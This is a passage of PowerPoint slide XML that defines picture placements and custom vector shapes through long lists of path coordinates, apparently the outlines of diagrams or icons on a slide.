                    <a:pt x="603146" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595241" y="4551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590405" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619048" y="21193"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585142" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587500" y="21722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591767" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593352" y="24709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596115" y="28366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="30561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="35681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580245" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620173" y="40578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="36636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="27370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620042" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619930" y="22900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684830" y="2296"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674142" y="2296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667803" y="3393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638055" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="42184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="57017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656688" y="91236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674244" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685501" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689057" y="95971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693532" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693720" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="88412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681782" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679151" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678970" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672720" y="76342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="55046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="43992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681335" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688264" y="2519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684830" y="2296"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="66812"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710514" y="66812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709437" y="67787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708035" y="68925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704642" y="71587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702793" y="72826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700802" y="74005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698285" y="75529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695905" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690357" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687553" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="66812"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="19791"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687553" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690867" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690572" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710340" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19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1" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278FD810-08F6-3E6A-351D-5DE6F57F763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74089" y="3025203"/>
              <a:ext cx="603836" cy="252008"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DCDE1A-B096-87BD-62E6-B402B5517AC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3734435" y="3297999"/>
              <a:ext cx="3444875" cy="212090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="908392" y="123444"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1625" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906741" y="135534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908392" y="123444"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1320596" y="120357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1320533" y="132549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636001" y="134073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="3444341" y="199669"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2909430" y="121945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907677" y="134010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3442589" y="211734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444341" y="199669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3" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9351912B-E777-79B9-87B8-2248C801585C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96636" y="2932199"/>
              <a:ext cx="527293" cy="990598"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2448D64-0BEE-3958-8195-2079C032413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49382" y="2787433"/>
              <a:ext cx="242574" cy="216386"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8004F1-6C89-6647-A342-905098B2D580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91534" y="2530371"/>
              <a:ext cx="654390" cy="955040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197DB8DA-2D9A-9562-3B3F-148045183B3A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25048" y="2760753"/>
              <a:ext cx="694928" cy="790950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C83FB80-0CEB-3BB5-1A65-DE25313EA61C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624286" y="2759961"/>
              <a:ext cx="696595" cy="793115"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="731672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="750381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262823" y="792527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263127" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138287" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="262599" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="738278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138162" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="722181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="142148" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562725" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="441195" y="678233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="668340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27598" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26790" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27714" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="674243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27057" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="674243"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1044" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="411470" y="643276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411470" y="683722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="594264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="681833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="436666" y="676651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436666" y="676651"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="416602" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11981"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="5170" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="672401" y="1580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="10942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="158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8" name="object 32">
              <a:extLst>
